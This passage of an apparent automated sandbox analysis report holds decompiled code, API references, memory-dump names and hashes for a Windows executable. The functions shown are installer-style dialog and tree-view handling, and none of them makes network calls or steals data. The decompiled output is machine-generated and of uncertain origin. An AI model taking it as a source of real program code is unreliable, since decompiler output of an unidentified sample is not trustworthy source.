										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x7a2fac);
									goto L86;
								} else {
									_t323 = E004012E2( *0x79f560);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x7a2fe0 = _a4;
					_v20 = 2;
					 *0x79f560 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_t264 = LoadImageA( *0x7a2f60, 0x6e, 0, 0, 0, 0);
					 *0x79f554 =  *0x79f554 | 0xffffffff;
					_v16 = _t264;
					 *0x79f55c = SetWindowLongA(_v8, 0xfffffffc, E0040516F);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x79f54c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x79f54c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E00406167(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404158(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404158(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x79f560 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x79f560 + _t329 * 4) = _t290;
									_v16 =  *( *0x79f560 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x7a2fac);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E0040418D(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040418D(_v12);
								L93:
								return E004041BF(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404b7b
0x00404b83
0x00404b8b
0x00404b91
0x00404ba9
0x00404bac
0x00404bad
0x00404dda
0x00404de1
0x00404df5
0x00404de3
0x00404de5
0x00404de8
0x00404de9
0x00404df0
0x00404df0
0x00404e01
0x00404e0f
0x00404e12
0x00404e28
0x00404e9d
0x00404ea0
0x00404ea2
0x00404eac
0x00404eba
0x00404eba
0x00404ebc
0x00404ec6
0x00404ecc
0x00404ecf
0x00404ed2
0x00404eed
0x00404ed4
0x00404ede
0x00404ede
0x00404ed2
0x00404ec6
0x00000000
0x00404ea0
0x00404e2d
0x00404e38
0x00404e3d
0x00404e44
0x00404e49
0x00404e4d
0x00404e58
0x00404e58
0x00404e5c
0x00404e60
0x00404e64
0x00404e77
0x00404e66
0x00404e66
0x00404e6d
0x00404e73
0x00404e6f
0x00404e6f
0x00404e6f
0x00404e6d
0x00404e7b
0x00404e7d
0x00404e90
0x00404e93
0x00404e96
0x00404e96
0x00404e60
0x00000000
0x00404e4d
0x00404e2f
0x00404e36
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ef0
0x00404ef0
0x00404ef7
0x00404f68
0x00404f70
0x00404f78
0x00404f78
0x00404f81
0x00404f83
0x00404f8a
0x00404f8d
0x00404f8d
0x00404f93
0x00404f9a
0x00404f9d
0x00404f9d
0x00404fa3
0x00404fa9
0x00404faf
0x00404faf
0x00404fbc
0x0040511c
0x00405123
0x00405140
0x00405146
0x00405158
0x00405158
0x00000000
0x00404fc2
0x00404fc4
0x00404fc9
0x00404fce
0x00404fd3
0x00404fd5
0x00404fd5
0x00404fd6
0x00404fd7
0x00404fd9
0x00404fd9
0x00404fe1
0x00405022
0x00405024
0x00405034
0x00405037
0x0040503c
0x00405043
0x00405046
0x004050e8
0x004050f0
0x004050f8
0x004050f8
0x00405106
0x00405117
0x00405117
0x00000000
0x00405106
0x0040504c
0x0040504f
0x00405055
0x0040505a
0x0040505c
0x0040505e
0x00405064
0x0040506b
0x00405070
0x00405077
0x0040507a
0x0040507a
0x00405081
0x0040508d
0x00405091
0x00405093
0x00405093
0x00405083
0x00405085
0x00405085
0x004050b3
0x004050bf
0x004050ce
0x004050ce
0x004050d0
0x004050d3
0x004050dc
0x00000000
0x00404fe3
0x00404fee
0x00404ff1
0x00404ff6
0x00404ff8
0x00404ffc
0x0040500c
0x00405016
0x00405018
0x0040501b
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ffe
0x00404ffe
0x00405004
0x00405006
0x00405006
0x00405007
0x00405008
0x00000000
0x00404ffe
0x00404fe1
0x00404fbc
0x00404eff
0x00000000
0x00404f15
0x00404f1f
0x00404f24
0x00000000
0x00000000
0x00404f36
0x00404f3b
0x00404f47
0x00404f47
0x00404f49
0x00404f58
0x00404f5a
0x00404f5e
0x00404f61
0x00000000
0x00404f61
0x00404eff
0x00404bb3
0x00404bb6
0x00404bb9
0x00404bc9
0x00404bdc
0x00404be7
0x00404bed
0x00404bfb
0x00404c0e
0x00404c13
0x00404c1e
0x00404c27
0x00404c3d
0x00404c4d
0x00404c59
0x00404c59
0x00404c5e
0x00404c64
0x00404c66
0x00404c69
0x00404c6e
0x00404c73
0x00404c75
0x00404c75
0x00404c95
0x00404c95
0x00404c97
0x00404c98
0x00404c9d
0x00404ca3
0x00404ca7
0x00404cac
0x00404cb4
0x00404cb8
0x00404cbd
0x00404cc2
0x00404cca
0x00404ccd
0x00404d9c
0x00404daf
0x00000000
0x00404cd3
0x00404cd6
0x00404cd9
0x00404cdc
0x00404cdc
0x00404ce1
0x00404cea
0x00404ced
0x00404cf1
0x00404cf4
0x00404cf7
0x00404d00
0x00404d09
0x00404d0c
0x00404d0f
0x00404d12
0x00404d50
0x00404d7b
0x00404d52
0x00404d61
0x00404d61
0x00404d14
0x00404d17
0x00404d25
0x00404d2f
0x00404d37
0x00404d3e
0x00404d49
0x00404d49
0x00404d12
0x00404d81
0x00404d82
0x00404d8e
0x00404d8e
0x00404d9a
0x00404db5
0x00404db8
0x00404dd5
0x00000000
0x00404dba
0x00404dbf
0x00404dc8
0x0040515a
0x0040516c
0x0040516c
0x00404db8
0x00000000
0x00404d9a
0x00404ccd

APIs

GetDlgItem.USER32 ref: 00404B74
GetDlgItem.USER32 ref: 00404B81
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BD0
LoadImageA.USER32 ref: 00404BE7
SetWindowLongA.USER32 ref: 00404C01
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C13
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C27
SendMessageA.USER32 ref: 00404C3D
SendMessageA.USER32 ref: 00404C49
SendMessageA.USER32 ref: 00404C59
DeleteObject.GDI32(00000110), ref: 00404C5E
SendMessageA.USER32 ref: 00404C89
SendMessageA.USER32 ref: 00404C95
SendMessageA.USER32 ref: 00404D2F
SendMessageA.USER32 ref: 00404D5F

Part of subcall function 0040418D: SendMessageA.USER32 ref: 0040419B

SendMessageA.USER32 ref: 00404D73
GetWindowLongA.USER32 ref: 00404DA1
SetWindowLongA.USER32 ref: 00404DAF
ShowWindow.USER32(?,00000005), ref: 00404DBF
SendMessageA.USER32 ref: 00404EBA
SendMessageA.USER32 ref: 00404F1F
SendMessageA.USER32 ref: 00404F34
SendMessageA.USER32 ref: 00404F58
SendMessageA.USER32 ref: 00404F78
ImageList_Destroy.COMCTL32(?), ref: 00404F8D
GlobalFree.KERNEL32 ref: 00404F9D
SendMessageA.USER32 ref: 00405016
SendMessageA.USER32 ref: 004050BF
SendMessageA.USER32 ref: 004050CE
InvalidateRect.USER32(?,00000000,00000001), ref: 004050F8
ShowWindow.USER32(?,00000000), ref: 00405146
GetDlgItem.USER32 ref: 00405151
ShowWindow.USER32(00000000), ref: 00405158

Strings

M, xrefs: 00404D17
, xrefs: 00405130
N, xrefs: 00404DF8

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: a2fedb8579bcb52de5b9606b7c8a61a7bcc9cbff960eb8f2c897277819485e7e
Instruction ID: 01e3f0ac69fe039d53c66122a0ee2819e5ae0f579c243cd3ce02c20529578500
Opcode Fuzzy Hash: a2fedb8579bcb52de5b9606b7c8a61a7bcc9cbff960eb8f2c897277819485e7e
Instruction Fuzzy Hash: AC025BB0900209AFDB10DFA8DD45AAE7BB5FB84354F10813AF610BA2E1D7799D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403C84, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00403C84(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t142;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x79f550 = _t35;
					if(_t116 == 0x110) {
						 *0x7a2f68 = _t126;
						 *0x79f564 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e530 = _t92;
						E00404158(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x7a2748);
						 *0x7a272c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x79f550 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x7a2fa0;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041A4(0x40b);
						while(1) {
							_t37 =  *0x79f550;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x7a2fa4;
							if(_t39 ==  *0x7a2fa4) {
								E0040140B(1);
							}
							__eflags =  *0x7a272c - _t134;
							if( *0x7a272c != _t134) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00406167(_t117, _t126, _t131, 0x7ab800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E00404158(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E00404158(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E00404158(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x7a300c - _t134;
							_v32 = _t49;
							if( *0x7a300c != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E0040417A(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79e530, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x7a300c - _t134;
							if( *0x7a300c == _t134) {
								_push( *0x79f564);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x79e530);
							}
							E0040418D();
							E004060D4(0x79f568, E00403C65());
							E00406167(0x79f568, _t126, _t131,  &(0x79f568[lstrlenA(0x79f568)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x79f568);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x7a2738);
									 *0x79ed40 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x7a2f60,  *_t131 +  *0x7a2740 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x7a2738 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E00404158(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x7a2738, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x7a272c - _t134;
									if( *0x7a272c != _t134) {
										goto L61;
									}
									ShowWindow( *0x7a2738, 8);
									E004041A4(0x405);
									goto L58;
								}
								__eflags =  *0x7a300c - _t134;
								if( *0x7a300c != _t134) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t134;
								if( *0x7a3000 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2738);
						 *0x7a2f68 = _t134;
						EndDialog(_t126,  *0x79e938);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x7a2738, 0x40f, 0, 1);
						__eflags =  *0x7a272c;
						return 0 |  *0x7a272c == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x79f548, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f548,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041BF(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x7a2738, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a300c - _t134;
										if( *0x7a300c == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x79e938 = 1;
											L21:
											_push(0x78);
											L22:
											E00404131();
											goto L26;
										}
										E0040140B(_t128);
										 *0x79e938 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x7a2738);
						 *0x7a2738 = _a12;
						L58:
						_t142 =  *0x7a0568 - _t134; // 0x0
						if(_t142 == 0 &&  *0x7a2738 != _t134) {
							ShowWindow(_t126, 0xa);
							 *0x7a0568 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403c8d
0x00403c96
0x00403dd7
0x00403ddb
0x00403ddf
0x00403de1
0x00403de6
0x00403df1
0x00403dfc
0x00403e01
0x00403e03
0x00403e05
0x00403e08
0x00403e0d
0x00403e1b
0x00403e28
0x00403e2f
0x00403e2f
0x00403e30
0x00403e30
0x00403e35
0x00403e3b
0x00403e42
0x00403e48
0x00403e4a
0x00403e8a
0x00403e8f
0x00403e94
0x00403e94
0x00403e99
0x00403ea2
0x00403ea4
0x00403ea9
0x00403eaf
0x00403eb3
0x00403eb3
0x00403eb8
0x00403ebe
0x00000000
0x00000000
0x00403ec9
0x00403ecf
0x00000000
0x00000000
0x00403ed8
0x00403ee0
0x00403ee5
0x00403ee8
0x00403eee
0x00403ef3
0x00403ef6
0x00403efc
0x00403f01
0x00403f04
0x00403f0a
0x00403f12
0x00403f18
0x00403f1e
0x00403f22
0x00403f29
0x00403f29
0x00403f29
0x00403f33
0x00403f45
0x00403f51
0x00403f56
0x00403f60
0x00403f66
0x00403f68
0x00403f6d
0x00403f6a
0x00403f6a
0x00403f6a
0x00403f7d
0x00403f95
0x00403f97
0x00403f9d
0x00403fb2
0x00403f9f
0x00403fa8
0x00403faa
0x00403faa
0x00403fb8
0x00403fc9
0x00403fda
0x00403fe1
0x00403feb
0x00403ff0
0x00403ff2
0x00000000
0x00403ff8
0x00403ff8
0x00403ffa
0x00000000
0x00000000
0x00404000
0x00404004
0x00404029
0x0040402f
0x00404035
0x00404037
0x00000000
0x00000000
0x0040405d
0x00404063
0x00404065
0x0040406a
0x00000000
0x00000000
0x00404070
0x00404073
0x00404076
0x0040408d
0x00404099
0x004040b2
0x004040bc
0x004040c1
0x004040c7
0x00000000
0x00000000
0x004040d1
0x004040dc
0x00000000
0x004040dc
0x00404006
0x0040400c
0x00000000
0x00000000
0x00404012
0x00404018
0x00000000
0x00000000
0x00000000
0x0040401e
0x00403ff2
0x004040e9
0x004040f5
0x004040fc
0x00000000
0x00403e4c
0x00403e4c
0x00403e4f
0x00403e82
0x00403e82
0x00403e84
0x00000000
0x00000000
0x00000000
0x00403e84
0x00403e55
0x00403e5a
0x00403e5c
0x00000000
0x00000000
0x00403e6c
0x00403e74
0x00000000
0x00403e7a
0x00403ca8
0x00403ca8
0x00403cac
0x00403cb1
0x00403cc0
0x00403cc0
0x00403cc9
0x00403cd2
0x00403cdd
0x00403cdd
0x00403ce9
0x00403d05
0x00403d08
0x00403d1b
0x00403d21
0x00403dc4
0x00000000
0x00403dcd
0x00403d27
0x00403d34
0x00403d36
0x00403d38
0x00403d57
0x00403d57
0x00403d5a
0x00403d5f
0x00403d62
0x00403d72
0x00403d73
0x00403d75
0x00403dab
0x00403dbe
0x00000000
0x00403dbe
0x00403d77
0x00403d7d
0x00403d96
0x00403d9b
0x00403d9d
0x00000000
0x00000000
0x00403d9f
0x00403d8b
0x00403d8b
0x00403d8d
0x00403d8d
0x00000000
0x00403d8d
0x00403d80
0x00403d85
0x00000000
0x00403d85
0x00403d64
0x00403d6a
0x00000000
0x00000000
0x00403d6c
0x00000000
0x00403d6c
0x00403d5c
0x00000000
0x00403d5c
0x00403d42
0x00403d49
0x00403d4f
0x00403d51
0x00000000
0x00000000
0x00000000
0x00403d51
0x00403d0d
0x00000000
0x00403ceb
0x00403cf1
0x00403cfb
0x00404102
0x00404102
0x00404108
0x00404115
0x0040411b
0x0040411b
0x00404125
0x00000000
0x00404125
0x00403ce9

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC0
ShowWindow.USER32(?), ref: 00403CDD
DestroyWindow.USER32 ref: 00403CF1
SetWindowLongA.USER32 ref: 00403D0D
GetDlgItem.USER32 ref: 00403D2E
SendMessageA.USER32 ref: 00403D42
IsWindowEnabled.USER32(00000000), ref: 00403D49
GetDlgItem.USER32 ref: 00403DF7
GetDlgItem.USER32 ref: 00403E01
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E1B
SendMessageA.USER32 ref: 00403E6C
GetDlgItem.USER32 ref: 00403F12
ShowWindow.USER32(00000000,?), ref: 00403F33
EnableWindow.USER32(?,?), ref: 00403F45
EnableWindow.USER32(?,?), ref: 00403F60
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F76
EnableMenuItem.USER32 ref: 00403F7D
SendMessageA.USER32 ref: 00403F95
SendMessageA.USER32 ref: 00403FA8
lstrlenA.KERNEL32(0079F568,?,0079F568,00000000), ref: 00403FD2
SetWindowTextA.USER32(?,0079F568), ref: 00403FE1
ShowWindow.USER32(?,0000000A), ref: 00404115

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 71237030e8c29ac09b165d61707d34f86db9337277703e75395ea54945556abe
Instruction ID: 3358382e01a0dfa2f7aaf81ce727bcb664174c2c7b1baf79b3eefcfdc57a0ccd
Opcode Fuzzy Hash: 71237030e8c29ac09b165d61707d34f86db9337277703e75395ea54945556abe
Instruction Fuzzy Hash: 6EC1D171500200AFDB21AF25EE89D2B3AB9EB96706F00453EF641B51F1CB3D9992DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004042C3, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004042C3(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79e534 =  *0x79e534 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041BF(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E00404567(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79e534 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed40 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040417A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404543();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a273c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040428E;
				E00404158(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00404158(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040417A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E0040418D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f74 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x79e534 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79e534 = 0;
				return 0;
			}

0x004042d3
0x004043f8
0x00404454
0x00404458
0x00404525
0x00404527
0x00404527
0x0040452d
0x0040452d
0x00404530
0x00000000
0x00404537
0x00404466
0x00404468
0x00404472
0x0040447d
0x00404480
0x00404483
0x0040448e
0x00404491
0x00404498
0x004044a6
0x004044be
0x004044c0
0x004044c8
0x004044d7
0x004044d9
0x004044d9
0x00404498
0x004044e3
0x00000000
0x004044ee
0x004044f2
0x00404503
0x00404503
0x00404509
0x00404517
